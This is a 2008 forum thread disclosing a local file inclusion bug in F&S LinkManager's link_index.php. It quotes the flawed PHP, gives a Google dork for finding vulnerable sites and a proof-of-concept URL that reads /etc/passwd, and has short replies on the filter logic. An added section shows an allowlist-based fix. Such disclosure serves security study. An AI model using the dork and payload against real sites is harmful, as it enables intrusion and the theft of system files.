Guest Kenpachi
Posted August 19, 2008

Software : F&S LinkManager 1.2 Final Gold Edition
BUG Type : Local File Inclusion
BUG In : link_index.php
BUG :

    $show = $HTTP_GET_VARS['show'];
    if ($show == "")
    {
        [...]
    }
    else {
        // [RFI FILTER]
        $oldshow = $show;
        $oldsize = strlen($show);
        $show = str_replace("http://", "" , $show);
        $show = str_replace("www", "" , $show);
        $show = str_replace("ftp://", "" , $show);
        $show = str_replace("https://", "" , $show);
        $newsize = strlen($show);
        if($oldsize == $newsize){
            // [NO LFI FILTER]
            include "$show";
        }
    }

Google Dork : inurl:"link_index.php?show"
POC : www.example.com/[path]/link_index.php?show=/etc/passwd

//Kenpachi @ RSTCENTER.COM
NO GREETS, JUST ME

On stroke's recommendation, here is also a link to download the software in question:
http://rapidshare.com/files/138499333/linklist.zip.html
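Added example, not part of the original post and not F&S LinkManager code: the filter above only rejects values containing URL fragments, so any local path still reaches `include`. A hardened lookup treats `show` as a key into an allowlist and confirms the resolved file stays inside one directory. The function name `resolve_show`, the page names and the directory layout are assumptions made for illustration.

```php
<?php
// Added example, not F&S LinkManager code. Directory layout and page
// names are assumptions; the sample inputs below are constructed.

/**
 * Map the user-supplied "show" value to a file inside $baseDir.
 * Returns the absolute path to include, or null when the request is rejected.
 */
function resolve_show(string $show, string $baseDir, array $allowedPages): ?string
{
    // 1. Allowlist: the request picks a key, it never supplies a path.
    if (!in_array($show, $allowedPages, true)) {
        return null;
    }

    // 2. Defence in depth: canonicalise and confirm the file is still inside
    //    the base directory (catches symlinks or a bad allowlist entry).
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $show . '.php');
    if ($base === false || $path === false) {
        return null; // base directory or page file does not exist
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null; // resolved outside the base directory
    }
    return $path;
}

// Constructed demo: build a throwaway pages directory so the script runs offline.
$baseDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'lm_pages_' . getmypid();
mkdir($baseDir);
file_put_contents($baseDir . DIRECTORY_SEPARATOR . 'links.php', "<?php echo 'links page';");

$allowed = ['links', 'submit'];   // hypothetical page names; 'submit' has no file
$samples = ['links', 'submit', '/etc/passwd', '../../etc/passwd', 'links.php'];

foreach ($samples as $show) {
    $target = resolve_show($show, $baseDir, $allowed);
    $result = $target === null ? 'rejected' : 'include ' . basename($target);
    printf("%-20s => %s\n", var_export($show, true), $result);
}

unlink($baseDir . DIRECTORY_SEPARATOR . 'links.php');
rmdir($baseDir);
```

Only `links` resolves to a file; every other sample, including the `/etc/passwd` value from the POC, is rejected before any `include` would run.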

kw3rln
Posted August 22, 2008

nice find
those programmers are kind of thick

    else {
        // [RFI FILTER]
        $oldshow = $show;
        $oldsize = strlen($show);
        $show = str_replace("http://", "" , $show);
        $show = str_replace("www", "" , $show);
        $show = str_replace("ftp://", "" , $show);
        $show = str_replace("https://", "" , $show);
        $newsize = strlen($show);
        if($oldsize == $newsize){
            // [NO LFI FILTER]

praitrok
Posted August 22, 2008

Couldn't it also be remote file inclusion if you try httphttp://:// ?

kw3rln
Posted August 22, 2008

> Couldn't it also be remote file inclusion if you try httphttp://:// ?

no no .. because then it no longer includes $show .. it no longer meets the new=old condition

Guest Kenpachi
Posted August 23, 2008

welcome captain obvious